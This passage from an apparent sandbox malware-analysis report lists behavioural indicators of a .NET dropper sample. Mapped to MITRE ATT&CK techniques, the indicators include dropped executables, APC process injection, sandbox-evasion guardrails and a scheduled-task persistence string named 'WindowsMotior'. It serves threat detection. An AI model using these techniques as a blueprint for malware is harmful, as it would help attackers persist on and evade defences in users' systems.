\"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\a891970b44db9e340c3ef3efa95b793c\\microsoft.visualbasic.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.net.http\\c1f72f0ca85cb675a88efe8f2067f7c8\\system.net.http.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\PROGID\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\PROGID\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-401", "type": 2, "relevance": 1, "name": "References task scheduler-related strings", "description": "file/memory contains long string with (Indicator: \"RegisterTask\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"RegisterTaskDefinition\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"ts.RootFolder.RegisterTaskDefinition(\"WindowsMotior\", td);\" (Indicator: \"RegisterTask\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"ts.RootFolder.RegisterTaskDefinition(\"WindowsMotior\", td);\" (Indicator: \"RegisterTaskDefinition\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"Deepseed Checker.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"Deepseed Checker.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"Deepseed Checker.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"Deepseed Checker.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"Deepseed Checker.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"NtQueueApcThread\" (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" connecting to \"\\ThemeApiPort\"\n \"Deepseed Checker.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe.config\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Deepseed Checker\\\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.INI\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe.Local\\\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"CLSID\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"DESCRIPTIONID\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"HELPTOPIC\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"RECURSIVESEARCH\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"TARGETKNOWNFOLDER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.EXE\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELLEX\\CONTEXTMENUHANDLERS\\COMPATIBILITY\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELLEX\\CONTEXTMENUHANDLERS\\COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\*\\SHELLEX\\CONTEXTMENUHANDLERS\\ FILESYNCEX\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\*\\SHELLEX\\CONTEXTMENUHANDLERS\\ FILESYNCEX\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\haifihndlq\\deepseed checker.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Deepseed Checker.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe]- [targetUID: 00000000-00002512]\n \"Update.exe\" has type \"PE32+ executable (GUI) x86-64 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\QknqBASLBEmK\\Update.exe]- [targetUID: 00000000-00003276]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Tries to sleep for a long time (more than two minutes)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify virtual environment by using API string\n Matched sigs: The input sample possibly contains the RDTSCP instruction", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"RNGCryptoServiceProvider\" (Indicator: \"RNGCryptoServiceProvider\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to \"RandomNumberGenerator\" (Indicator: \"RandomNumberGenerator\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to \"RC29\" (Indicator: \"RC2\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-129", "relevance": 1, "name": "Dotnet file resource with suspicious entropy", "description": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0 has big resource with name: \"CosmicBinder.Resources.File1.exe\" size: \"6047859\" and abnormal entropy:\"7.98610078801\"\n 8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0 has big resource with 